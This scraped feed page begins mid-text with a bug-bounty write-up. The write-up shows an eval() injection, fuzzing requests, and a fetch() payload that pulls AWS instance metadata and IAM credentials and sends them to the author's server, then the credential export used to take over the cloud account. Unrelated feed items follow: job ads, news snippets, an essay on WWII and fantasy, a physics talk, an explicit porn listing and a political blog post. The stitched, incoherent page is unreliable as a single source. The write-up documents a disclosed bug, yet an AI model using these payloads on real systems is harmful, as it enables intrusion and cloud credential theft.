    helper.prototype.Union = function() { for (var _len22 = arguments.length, args = Array(_len22), _key22 = 0; _key22 < _len22; _key22++) args[_key22] = arguments[_key22]; var value = args.shift(), symbol = args.shift(), results = args.filter(function(arg) { try { return eval(value + symbol + arg) } catch (e) { return !1 } }); return !!results.length }

    Did you notice that? Did you notice that kinky eval() ? Looks sooooooooooo interesting! I copied the code on a local HTML file in order to perform more tests.

    Basically the function can take from 0 to infinite arguments but start to be useful at 3. The eval() is used to compare the first argument to the third one with the help of the second, then the fourth is tested, the fifth etc… Normal usage should be something like Union(1,'<',3); and the returned value true if at least one of these tests is true or false .

    However there is absolutely no sanitization performed or test regarding the type and the value of the arguments. With the help of my favourite debugger -alert()- I understood that an exploit could be triggered in many different ways:

    Union( 'alert()//', '2', '3' ); Union( '1', '2;alert();', '3' ); Union( '1', '2', '3;alert()' ); ... Find an injection point

    Ok so I had a vulnerable function, which is always good, but what I needed was a input to inject some malicious code. I remembered that I already seen some POST parameters using Banan++ functions so I performed a quick search in my Burp Suite history. Got it:

    POST /REDACTED HTTP/1.1 Host: api.REDACTED.com Connection: close Content-Length: 232 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (X11; linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3502.0 Safari/537.36 autochrome/red Content-Type: application/json;charset=UTF-8 Referer: https://app.REDACTED.com/REDACTED Accept-Encoding: gzip, deflate Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: auth=REDACTED {...REDACTED...,"operation":"( Year( CurrentDate() ) > 2017 )"}

    Response:

    HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 54 Connection: close X-Content-Type-Options: nosniff X-Xss-Protection: 1 Strict-Transport-Security: max-age=15768000; includeSubDomains ...REDACTED... [{"name":"REDACTED",...REDACTED...}]

    The parameter operation seems to be a good option. Time for testing!

    Perform the injection

    Since I didn’t know anything about Banan++, I had to perform some tests in order to find out what kind of code I could inject or not. Sort of manual fuzzing.

    {...REDACTED...,"operation":"'\"><"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":null} [] {...REDACTED...,"operation":"0"} [] {...REDACTED...,"operation":"1"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"a"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"a=1"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"alert"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"alert()"} {"status":400,"message":"Function 'alert' is not defined"} {...REDACTED...,"operation":"Union()"} []

    What I conclued here was:

    operation

    Let’s continue with Union() :

    {...REDACTED...,"operation":"Union(1,2,3)"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"Union(a,b,c)"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"Union('a','b','c')"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"Union('a';'b';'c')"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"Union('1';'2';'3')"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"Union('1';'<';'3')"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"Union('1';'>';'3')"} []]

    Perfect! If 1 < 3 then the response contains valid datas (true), but if 1 > 3 then the response is empty (false). Parameters must be separated by a semi colon. I could now try a real attack.

    fetch is the new XMLHttpRequest

    Because the request is an ajax call to the api that only returns JSON datas, it’s obviously not a client side injection. I also knew from a previous report that ArticMonkey tends to use alot JavaScript server side.

    But it doesn’t matter, I had to try everything, maybe I could trigger an error that would reveal informations about the system the JavaScript runs on. Since my local testing, I knew exactly how to inject my malicious code. I tried basic XSS payloads and malformed JavaScript but all I got was the error previously mentionned.

    I then tried to fire an HTTP request.

    Through ajax call first:

    x = new XMLHttpRequest; x.open( 'GET','https://poc.myserver.com' ); x.send();

    But didn’t receive anything. I tried HTML injection:

    i = document.createElement( 'img' ); i.src = '<img src="https://poc.myserver.com/xxx.png">'; document.body.appendChild( i );

    But didn’t receive anything! More tries:

    document.body.innerHTML += '<img src="https://poc.myserver.com/xxx.png">'; document.body.innerHTML += '<iframe src="https://poc.myserver.com">';

    But didn’t receive anything!!!

    Sometimes you know, you have to test stupid things by yourself to understand how stupid it was… Obviously it was a mistake to try to render HTML code, but hey! I’m just a hacker… Back to the ajax request, I stay stuck there for a while. It toke me quite a long time to figure out how to make it work.

    I finally remembered that ArticMonkey uses ReactJS on their frontend, I would later learnt that they use NodeJS server side. Anyway, I checked on Google how to perform an ajax request with it and found the solution in the official documention which lead me to the fetch() function which is the new standard to perform ajax call, that was the key.

    I injected the following:

    fetch('https://poc.myserver.com')

    And immediately got a new line in my Apache log.

    Being able to ping my server is a thing but it’s a blind SSRF, I had no response echoed back. I had the idea to chain two requests where the second would send the result of the first one. Something like:

    x1 = new XMLHttpRequest; x1.open( 'GET','https://...', false ); x1.send(); r = x1.responseText; x2 = new XMLHttpRequest; x2.open( 'GET','https://poc.myserver.com/?r='+r, false ); x2.send();

    Again it toke me while to get the correct syntax with fetch() . Thanks StackOverflow .

    I ended with the following code which works pretty well:

    fetch('https://...').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

    Of course, Origin policy applies.

    SSRF for the win

    I firstly tried to read local files:

    fetch('file:///etc/issue').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

    But the response ( r parameter) in my Apache log file was empty.

    Since I found some S3 buckets related to ArticMonkey ( articmonkey-xxx ), I thought that this company might also use AWS servers for their webapp (which was also confirmed by the header in some responses x-cache: Hit from cloudfront ). I quickly jump on the list of the most common SSRF URL for Cloud Instances .

    And got a nice hit when I tried to access the metadatas of the instance.
    AWS takeover through SSRF in JavaScript

    Final payload:

    {...REDACTED...,"operation":"Union('1';'2;fetch(\"http://169.254.169.254/latest/meta-data/\").then(res=>res.text()).then((r)=>fetch(\"https://poc.myserver.com/?r=\"+r));';'3')"}

    Decoded output is the directory listing returned:

    ami-id ami-launch-index ami-manifest-path block-device-mapping/ hostname iam/ ...

    Since I didn’t know anything about AWS metadatas, because it was my first time in da place. I toke time to explore the directories and all files at my disposition. As you will read everywhere, the most insteresting one is http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE> . Which returned:

    { "Code":"Success", "Type":"AWS-HMAC", "AccessKeyId":"...REDACTED...", "SecretAccessKey":"...REDACTED...", "Token":"...REDACTED...", "Expiration":"2018-09-06T19:24:38Z", "LastUpdated":"2018-09-06T19:09:38Z" } Exploit the credentials

    At that time, I though that the game was ended. But for my PoC I wanted to show the criticity of this leak, I wanted something really strong! I tried to use those credentials to impersonate the company. You have to know that they are temporary credentials, only valid for a short period, 5mn more or less. Anyway, 5mn is supposed to be enough to update my own credentials to those ones, 2 copy/paste, I think I can handle that… err…

    I asked for help on Twitter from SSRF and AWS master. Thank guys, I truely appreciate your commitment, but I finally found the solution in the UserGuide of AWS Identity and Access Management . My mistake, except to not read the documentation (…), was to only use AccessKeyId and SecretAccessKey , this doesn’t work, the token must also be exported. Kiddies…

    $ export AWS_ACCESS_KEY_ID=AKIAI44... $ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI... $ export AWS_SESSION_TOKEN=AQoDYXdzEJr...

    Checking my idendity with the following command proved that I was not myself anymore.

    aws sts get-caller-identity

    And then…


    AWS takeover through SSRF in JavaScript

    Left: listing of the EC2 instances configured by ArticMonkey. Probably a big part -or the whole- of their system.

    Right: the company owns 20 buckets, containing highly sensitive datas from customers, static files for the web application, and according to the name of the buckets, probably logs/backups of their server.

    Impact: lethal.

    Timeline

    06/09/2018 12h00 - beginning of the hunt

    07/09/2018 00h30 - report

    07/09/2018 19h30 - fix and reward

    Thanks to ArticMonkey for being so fast to fix and reward, and agreed this article :)

    Conclusion

    I learnt alot because of this bug:

    ReactJS, fetch(), AWS metadatas. RTFM! The official documentation is always a great source of (useful) informations. At each step new problems appeared. I had to search everywhere, try many different things, I had to push my limits to not give up. I now know that I can fully compromise a system by myself starting from 0, which is a great personal achievement and statisfaction :)

    When someone tells you that you’ll never be able to do something, don’t waste your time to bargain with these peoples, simply prove them they’re wong by doing it.


              Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
    The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

              Machiniste - Groupe SFP ressources humaines - Fermont, QC      Cache   Translate Page      
    *ArcelorMittal Exploitation minière Canada s.e.n.c.* est le numéro un mondial de l’exploitation sidérurgique et minière et compte plus de 220 000 employés... $39.76 - $45.10 an hour
    From Indeed - Wed, 01 Aug 2018 19:33:47 GMT - View all Fermont, QC jobs
              BCEJP00017403 - Analyste principal sécurité - Modis Canada - Montréal, QC      Cache   Translate Page      
    Analyste principal sécurité Assure la planification, la conception, la construction et l'exploitation des réseaux de la compagnie de plusieurs milliards de...
    From Modis Canada - Fri, 05 Oct 2018 21:37:09 GMT - View all Montréal, QC jobs
              C’est fini les clandos…Le préfet les interdit      Cache   Translate Page      
    clandos

    clandos

    C’est cuit pour tous les usagers de clandos…Le préfet de Dakar vient de lancer la chasse aux véhicules non détenteurs de permis d’exploiter de transport communément appelés « clandos ». Et le préfet les menace de les mettre en fourrière…Donc c tous les usagers de ces voitures moins chers vont devoir chercher le prix du bu ou […]
              Democrats Can Exploit the ‘McCain Divide’ in the GOP      Cache   Translate Page      
    This piece is only available to Political Wire members. Your support makes this site possible. Join today for the complete Political Wire experience and get exclusive analysis, new features and no advertising. Sign in to your account or join today! Join for just $5 a month or $50 a year.
              Part-Time Professor - Network Systems and Components - Durham College - Oshawa, ON      Cache   Translate Page      
    This is a necessary foundation for further investigations and the testing of remedial actions covered in in the Access Controls, Hacking &amp; Exploits and Network...
    From Durham College - Wed, 26 Sep 2018 07:27:59 GMT - View all Oshawa, ON jobs
              Comment on Iran’s Ayatollah exploits Jewish Olympian Aly Raisman for pro-hijab propaganda by Hideous Islamic Hijab      Cache   Translate Page      
    Sexual assault has nothing to do with a woman's clothing. Again the Jew-hating Ayatollah Khamenei blames the woman in this case a proud Jew. A man who sexually assaults a woman is not normal. Usually he is a substance abuser and sociopath. Muslim men murder, assault,honour kill and rape Muslim women wearing the Islamic hijab. Rape is about power and control and muslim men control women by imposing the hideous hijab but that does not stop them from raping. Always putting the blame on the woman.
              DeVos Ally, New Leader of For-Profit K12 Inc. Promises to Clean Up Its Shoddy Record | Diane Ravitch's blog      Cache   Translate Page      
    DeVos Ally, New Leader of For-Profit K12 Inc. Promises to Clean Up Its Shoddy Record | Diane Ravitch's blog

    DeVos Ally, New Leader of For-Profit K12 Inc. Promises to Clean Up Its Shoddy Record


    Over the years, it has become obvious that virtual charter schools are a sham. ECOT in Ohio was a spectacular failure, which made millions for its for-profit owner (“the ECOT man”) but cost taxpayers over a billion dollars that should have gone to public schools. The founder of the Pennsylvania Cyber Charter School is now in jail, convicted of stealing millions of dollars, but convicted only of tax evasion, not embezzlement. June Brown, who operated K12 Inc. schools in Pennsylvania, avoided conviction because of her advanced age (she kept the money).

    K12 Inc. is perhaps the biggest of the shams because it has the most students. It is listed on the New York Stock Exchange. It makes handsome profits, but its students drop out at a high rate and get low test scores on state tests. The NCAA stripped 24 of the virtual K12 Inc. schools of accreditation a few years back after it discovered that students were often taking the K12 Inc. tests without bothering to first sit for instruction. NCAA officials saw tests that included “true-false” questions, and observed that students could take the test again if they failed. Any number of K12 Inc. virtual schools have been engaged in fraudulent practices that led to fines or even jail sentences for their operators.

    K12 Inc. has been repeatedly criticized for the poor performance of its students. They start behind and they don’t catch up. See here. See here. See here. See here.
    K12 Inc. originated with Ron Packard, who was paid $5 million a year to Continue reading: DeVos Ally, New Leader of For-Profit K12 Inc. Promises to Clean Up Its Shoddy Record | Diane Ravitch's blog



              Titre Associé aux Ventes Sans-Fil - Sept Iles - OSL Retail Services Inc - Sept-Îles, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Mon, 24 Sep 2018 13:21:37 GMT - View all Sept-Îles, QC jobs
              Titre Associé aux Ventes Sans-Fil - Alma - OSL Retail Services Inc - Alma, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Fri, 06 Jul 2018 01:21:59 GMT - View all Alma, QC jobs
              Titre Associé aux Ventes Sans-Fil - Val D'Or - OSL Retail Services Inc - Val-d'Or, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Thu, 20 Sep 2018 01:20:16 GMT - View all Val-d'Or, QC jobs
              Titre Gérant de Magasin Sans-Fil - OSL Retail Services Inc - Québec City, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Chez OSL, nous savons comment récompenser nos employés. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans...
    From OSL Retail Services Inc - Mon, 17 Sep 2018 19:20:40 GMT - View all Québec City, QC jobs
              Titre Associé aux Ventes Sans-Fil - Levis - OSL Retail Services Inc - Lévis, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Thu, 04 Oct 2018 19:19:16 GMT - View all Lévis, QC jobs
              Titre Associé aux Ventes Sans-Fil - Victoriaville - OSL Retail Services Inc - Victoriaville, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Wed, 03 Oct 2018 13:20:36 GMT - View all Victoriaville, QC jobs
              Titre Associé aux Ventes Sans-Fil - Ste-Agathe des Monts - OSL Retail Services Inc - Sainte-Agathe-des-Monts, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Wed, 22 Aug 2018 19:20:44 GMT - View all Sainte-Agathe-des-Monts, QC jobs
              Titre Gérant de Magasin Sans-Fil - Joliette - OSL Retail Services Inc - Joliette, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Chez OSL, nous savons comment récompenser nos employés. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:20:02 GMT - View all Joliette, QC jobs
              Titre Associé aux Ventes Sans-Fil - Joliette - OSL Retail Services Inc - Joliette, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:19:46 GMT - View all Joliette, QC jobs
              Titre Associé aux Ventes Sans-Fil - Drummondville - OSL Retail Services Inc - Drummondville, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Thu, 12 Jul 2018 01:18:36 GMT - View all Drummondville, QC jobs
              10/10/2018: CANADA: Notley, Kenney clash over Odin photos      Cache   Translate Page      

    EDMONTON • Alberta Premier Rachel Notley says Opposition Leader Jason Kenney must stop “dog-whistle” politics that allow hateful extremists to believe they have a home in his United Conservative Party. But Kenney is accusing Notley of exploiting a...
              Google fait appel de l'amende record de 4,3 milliards d'euros pour Android      Cache   Translate Page      
    (zonebourse.com) Bruxelles (awp/afp) - Google a fait appel mardi de l'amende record de 4,34 milliards d'euros qui lui avait été infligée en juillet par l'UE pour position dominante de son système d'exploitation pour smartphones Android, a annoncé le groupe américain. "Nous avons fait appel contre la décision de la...
    http://www.zonebourse.com/APPLE-4849/actualite/Google-fait-appel-de-l-amende-record-de-4-3-milliards-d-euros-pour-Android-27394031/?utm_medium=RSS&utm_content=20181009
              10/10/2018: NEWS: Notley criticizes Kenney over photos of UCP members with Soldiers of Odin      Cache   Translate Page      

    Alberta Premier Rachel Notley says Opposition Leader Jason Kenney must stop “dog-whistle” politics that allow hateful extremists to believe they have a home in his United Conservative Party (UCP). But Mr. Kenney is accusing Ms. Notley of exploiting a...
              World War II and Epic Fantasy      Cache   Translate Page      
    Epic fantasy is, arguably, a form of storytelling highly influenced by the Second World War. World War II remains unusual in military history for being a conflict which can clearly be divided between the “bad guys” (Nazi Germany and Imperial Japan) and the “good guys” (the plucky Brits, the brave French Resistance and the heroic-if-a-bit-tardy United States of America) with a minimum of moral uncertainty. Popular narratives of the Second World War show the heroic, democracy-loving Brits and Yanks storming the beaches of Normandy to save Europe from the diabolical and evil rule of the brutal Third Reich.

    Christopher Lee as Saruman in Peter Jackson's Lord of the Rings movie trilogy. Lee fought in the British special forces in WWII, in operations that he refused to discuss even decades afterwards.

    This is of course monstrously simplistic, and ignores the morally murkier elements of the conflict, such as the Allied mass bombing campaign that was designed to slaughter as many German civilians as possible, and of course the involvement of the Soviet Union in the war. The USSR committed many atrocities of its own (including being complicit in Germany’s invasion of Poland which started the war in the first place) and was willing to accept staggering military and civilian losses to finally defeat the Germans and capture Berlin (a fact glossed over in western accounts of the conflict, which tend to suggest that the US and UK were the primary architects of Hitler’s downfall rather than relative bystanders). Still, the sometimes almost cartoonishly evil nature of the Nazi regime (“Are we the bad guys? If not, why do our uniforms have skulls on them?”) allows it to be presented as an irredeemable foe who must be destroyed at all costs with a minimum of moral qualms, very useful for propaganda, morale and rousing novels, films and video games.

    Epic fantasy written in the post-war era feels like it is influenced by this conflict. People writing fantasy in this period either fought in the war directly, were children during it or were born in the aftermath of the conflict and grew up with stories of it from their parents and grandparents.

    The fantasy saga sometimes said to have been most influenced by the war is The Lord of the Rings, although J.R.R. Tolkien was scornful of this. He started writing the book in late 1937, two years before the conflict even began, and the story and themes of the book developed out of The Hobbit, mostly written in 1930-32 or thereabouts. The titular One Ring itself is sometimes compared to a nuclear bomb (in its ability to end the War of the Ring in a single stroke rather than actual destructive power) and much is made of the Scouring of the Shire and its similarity to the military occupation of a formerly peaceful territory. However, the Ring was created for The Hobbit and its powers established long before the outbreak of the conflict. Tolkien himself was furious with the idea of the book being an allegory (noting he detested allegory wherever it was found), but did acknowledge the idea of “applicability,” and the disturbing feeling that real events were conforming (somewhat) to those in the book rather than vice versa. Tolkien did acknowledge a much greater influence on the book by his own experiences in World War I, particularly the several months he spent on the Western Front during the Battle of the Somme. The Frodo-Sam relationship is reminiscent of that between a gentleman soldier and his batman, and the Dead Marshes with their hordes of corpses (and semi-undead) lying face-up in the flooded marshlands being an image that stuck with Tolkien from the aftermath of bloody engagements.

    Skipping ahead a few generations, Margaret Weis and Tracy Hickman’s Dragonlance Chronicles feels like a revamp of the Second World War. The forces of evil gain a series of military advantages from the return of the dark goddess Takhisis and the ability to control evil dragons in battle. This allows them to overrun half the continent of Ansalon and push the remaining nations and our heroes to the brink of defeat. However, our heroes gain the favour of the god Paladine, the allegiance of the good dragons and then the ability to use the fabled dragonlances in battle. This turns the tide and routs the enemy. This can be seen as a reflection of the military technology in WWII: the Germans’ early innovation and technical ingenuity gave them a keen early edge that allowed them to defeat everyone they faced in battle, but later in the conflict the Allies first matched and then exceeded their technological advantage, which the Germans could not sustain and ultimately lost.

    Many epic fantasies feature narratives not dissimilar to this. The Wheel of Time shows a growing threat from a powerful opponent who is allowed to go unchecked because the nations that should be unifying against them can’t stop their squabbles with one another, even when the threat becomes blatant. This is an echo of the way Hitler expertly exploited inter-war rivalries between nations such as Russia and Poland to stop opponents joining forces against him (and, indeed, struck an unlikely alliance himself with Russia which prevented them from joining France and Britain in the war). The decision of the forces of “Light” in the books to join forces with the morally highly dubious Seanchan to fight the Dark One can be seen as a reflection of the reluctance with which nations like Britain (whose leader, Churchill, held a deep and abiding hatred of Communism) allied with Russia to fight the greater threat, and the repeated warning that this alliance could sow the seeds of a greater conflict later on (as it very nearly did, with the Cold War almost going nuclear-hot on several occasions, and various visions in The Wheel of Time showing a future where the Seanchan and the other nations resume their conflict).

    George R.R. Martin’s A Song of Ice and Fire is rather different, however. The conflict between the Great Houses is of course most strongly influenced by the Wars of the Roses, but there is also a strong influence from World War I: the Houses go to war against one another in a manner reflecting their inter-war alliances and fuelled by grievances (just and unjust) extending back generations, with Jon Arryn’s death and then Tyrion Lannister’s arrest setting in motion a series of falling dominoes leading to conflict as much as Franz Ferdinand’s assassination in August 1914.

    The most notable fantasy novel series directly based on World War II is Harry Turtledove’s Darkness series, a six-volume series set on a continent resembling Eurasia which is riven by war. Technological developments are replaced by discoveries in the field of sorcery but every nation has its real-world analogue (albeit often inverted; the war in the desert in Africa is replaced by a war on a southern polar continent) and the conflict unfolds in a very similar manner. Turtledove of course likes to revisit WWII in his alternate history fiction, with his splendidly readable, pulp Worldwar series being set during a WWII interrupted by the arrival of an alien invasion fleet, and his darker Southern Victory series in which the Confederacy survives the Civil War as an independent state and becomes embroiled in further conflicts leading to the establishing of a North American theatre in WWII (which, due to a German victory in WWI and no rising of the Nazi Party, unfolds very differently).


    A recent fantasy which directly echoes the war is the video game series Valkyria Chronicles. Set on the continent of Europa, the story charts the outbreak of war between the East Europan Imperial Alliance (a blending of Nazi Germany in ideology and Soviet Russia in size and manpower) and the Atlantic Federation (a mixture of western European nations such as Britain and France, and NATO of the Cold War period, albeit with an American analogue which is very reluctant to get involved in the fight). The war opens with the Empire invading the Federation and the small neutral nation of Gallia (based loosely on the Netherlands and Belgium), the latter both to seize its deposits of ragnite (a valuable ore which powers advanced technology) and to allow it to invade the Federation on a second front. Unlike the real war, where the Low Countries were overrun quickly, in the game the much smaller Gallian army is able to rally around the nation’s complex geography (particularly its rivers and canals) and prevent the numerically superior Imperial army from seizing the country. The Empire’s insistence on deploying increasingly insane and impractical tanks on the battlefield and its constant hunt for superweapons is an echo of Hitler’s insistence on deploying increasingly unreliable new technology during WWII rather than refining existing designs, not to mention his increasingly desperate search for “doomsday weapons” that could end the war quickly. Even the Mamota, an insane “land battleship” which the Empire uses at the end of the game, is based on a real idea, the Landkreuzer P.1000 Ratte, a 1,000-ton tank Hitler heartily endorsed but whose development was cancelled by Albert Speer on the reasonable grounds it was ridiculous.

    Valkyria Chronicles (2008) is unusual in combining both direct WWII elements – guns, artillery, grenades, tanks, propaganda and pogroms against a scapegoated minority (the Darcsens replacing the Jews) – and traditional fantasy tropes. There is an ancient magical race, the Valkyrur, whose power lingers into the modern age and at key moments both protagonists and antagonists gain access to their power. There are magical items and hopeless struggles by a plucky band of up-against-the-odds heroes against monstrous enemies (although some of them are shown to have a code of individual honour at odds with the atrocities their forces commit). Surprisingly cynically, the Federation, which becomes prominent in Valkyria Chronicles 4 (2018), is shown to sometimes be brutal and cold as well, willing to sacrifice vast numbers of civilian lives and infringe the borders of sovereign nations in order to get an upper hand against the Empire and is secretly developing a weapon of mass destruction behind the scenes. The oddest element of the Valkyria universe, given how closely it parallels WWII, is the near-total absence of aircraft from the conflict, with the few aircraft mentioned or appearing being WWI-style biplanes.

    Of course, the straightforward (if not exactly accurate) good vs. evil nature of WWII gave rise afterwards to much more morally murky conflicts where the notions of good, evil, justice and injustice became far more fluid: Suez, Vietnam, Bosnia, the Iraq War and clashes of religious fundamentalists. This can be seen in the type of fantasy fiction that has followed: the Black Company (by Vietnam vet Glen Cook) and Steven Erikson’s The Malazan Book of the Fallen (inspired by a lot of war fiction, and indeed The Black Company) are much less clear-cut tales where good and evil are less of an issue. Joe Abercrombie explores some of the same issues of morally flexible real politik in his First Law world. Scott Bakker’s Second Apocalypse series (including the Prince of Nothing and Aspect-Emperor sub-series) delves deep into religious fundamentalism and fanaticism. Mark Lawrence’s Broken Empire series presents the world with a monstrously damaged human being who commits atrocities but who, ultimately, may end up saving the world. The moral relativism of post-WWII conflicts has been well matched and explored by fantasy fiction, perhaps too much for some as we’ve also seen a re-emergence of throwback fantasy, more concerned with more straightforward tales of good vs. evil (such as Michael Sullivan’s Ririya series and Brandon Sanderson’s Cosmere works).

    WWII will remain a rich source of inspiration for fantasy fiction, although it is refreshing (if perhaps a tad depressing) to see other, less clear-cut conflicts being mined for different kinds of stories.

    Thank you for reading The Wertzone. To help me provide better content, please consider contributing to my Patreon page and other funding methods, which will also get you exclusive content weeks before it goes live on my blogs. The History of The Wheel of Time, SF&F Questions and The Cities of Fantasy series are debuting on my Patreon feed and you can read them there one month before being published on the Wertzone.

              Grand Exploits Travels opens office in Lagos      Cache   Translate Page      

    Nairametrics

    Grand Exploits Limited has opened for business in Lagos. The formal opening of the office located at Pees Galleria Shopping Mall.

    The post Grand Exploits Travels opens office in Lagos appeared first on Nairametrics.


              Machiniste - Groupe SFP ressources humaines - Fermont, QC      Cache   Translate Page      
    *ArcelorMittal Exploitation minière Canada s.e.n.c.* est le numéro un mondial de l’exploitation sidérurgique et minière et compte plus de 220 000 employés... $39.76 - $45.10 an hour
    From Indeed - Wed, 01 Aug 2018 19:33:47 GMT - View all Fermont, QC jobs
              Physics Colloquium: Quantum Inspired Photonics      Cache   Translate Page      
    Wednesday, Oct 10
    (4 p.m. - 5 p.m.)

    Dr. Liang Feng (University of Pennsylvania)

    Quantum mechanics and photonics share mathematical equivalence. By carefully exploiting the interplay between optical index, gain and loss in the complex dielectric permittivity plane, optics has become an ideal platform to explore some exotic quantum concepts, such as topological physics and parity-time (PT) symmetry. Instead of counteracting optical losses at micro and nano scales in integrated photonics, we started from an opposite viewpoint and developed a new paradigm of positively and strategically manipulating optical losses by the quantum-inspired photonics concept enrich fundamental optical physics and realized novel photonic synthetic matters with unique optical functionalities. In this seminar, I will present our recent efforts on engineering the complex optical potentials at an exceptional point (i.e. PT symmetry transition point). Based on the exceptional point-induced unidirectionality, we harness optical losses to enable unique microlaser functionalities, in particular, an orbital angular momentum (OAM) microlaser that structures and twists the lasing radiation at the microscale, which is expected to address the growing demand for information capacity. Additionally, I will discuss non-Hermitian topological photonics where optical non-Hermiticity and topological physics are coupled.


              Naughty Alysha's My Whore Life vol 11      Cache   Translate Page      

    Studio: Sticky Video
    Cast: Naughty Alysha
    Genres: Big Boobs, Big Butt, Blondes, Gonzo, Mature, Naturally Busty, Star showcase
    Video language: English

    Reality Porn at it's best!!! Watch the real life sexploits of superwhore Naughty Alysha in this hardcore fuckumentary. Tons of sucking & fucking round out her daily activities!!!

    Format: mp4
    Duration: 1:28:56
    Video: 720x404, AVC (H.264), 1640kbps
    Audio: 158kbps




    File size: 1.1 GB






              Maître de poste – Local fourni par le Maître de poste - (catégorie groupe) - Canada Post - Beaver Creek, YT      Cache   Translate Page      
    Exploiter le bureau de poste avec la diligence et l’efficacité qui conviennent. Conserver le bureau de poste propre et présentable, et maintenir la propreté en... $16.71 an hour
    From Canada Post - Tue, 19 Jun 2018 00:37:23 GMT - View all Beaver Creek, YT jobs
              directeur/directrice de l'exploitation - services administratifs - Boys and Girls Club of Yukon - Whitehorse, YT      Cache   Translate Page      
    Langues Anglais Études Baccalauréat Expérience 5 ans ou plus Compétences particulières Embaucher, former ou déléguer la formation du personnel; Faire... $37,000 - $42,250 a year
    From Guichet emplois - Wed, 19 Sep 2018 04:47:53 GMT - View all Whitehorse, YT jobs
              IIS attacks surge from 2,000 to 1.7 million over last quarter      Cache   Translate Page      

    IIS, Drupal, and Oracle WebLogic web technologies experienced increased attacks in Q2 2018. According to a new threat report from eSentire, IIS attacks showed a massive increase, from 2,000 to 1.7 million, since last quarter. Exploit campaigns observed April 1 – July 1, 2018 Analysis of the attacks revealed that both IIS and WebLogic exploits maintained a consistent number of attacks (about 200) per IP across organizations, with those attacks originating from servers hosting Apache, … More

    The post IIS attacks surge from 2,000 to 1.7 million over last quarter appeared first on Help Net Security.


              More Easy Answers      Cache   Translate Page      

    So, yeah. Easy answers. Achievement without effort. This desire for maximum output with minimum input is hard-wired into us. Being able to figure out the simplest way to achieve one's goals is a survival mechanism. But sometime's evolutionary traits can backfire. Especially when one lives within a self-reinforcing protective bubble of information.

    The climate change deniers, the anti-vaxxers, right-wing troglodytes, Hillary-bots, partisans of all stripes, hive off into their little communities of self-adulation and self-praise and become so enamored of the endless stream of mental rewards they dole out to one another that they become disconnected from reality.

    And when the deluded praise supplants the actual achievements, they don't even notice how insane they're acting. Personally, I'm of the opinion that Justin Trudeau is probably not a bad guy. I'm sure he's somewhat arrogant due to the prestige of his father's name and due to his own astonishingly good looks. Combine this with what appears to be a definite mental shallowness and I'm also sure that he's not an individual I'd ordinarily seek out for his company. (He'll live, I'm sure.) But overall, he's probably a fairly agreeable chap.

    So why is he pushing these bitumen pipelines and running roughshod over promises (very important promises) to the First Nations? Why is he continuing with stephen harper's Orwellian surveillance legislation? Why is he so prepared to be a neo-liberal thug in so many areas (albeit while wiping a tear from his liberal eye)?

    Probably because he has immersed himself in the bubble of delusion that is the Liberal Party of Canada.


    Think about it. He spends all day either very busy reading reports made by like-minded researchers, or speaking with like-minded partisans. And much of his workplace discussion focuses on convincing a conservative, corporatist media on the soundness of Liberal approaches to ideas and policies. He has neither the time, nor the inclination, nor the incentive to genuinely consider and interact with contrary sources of opinion.

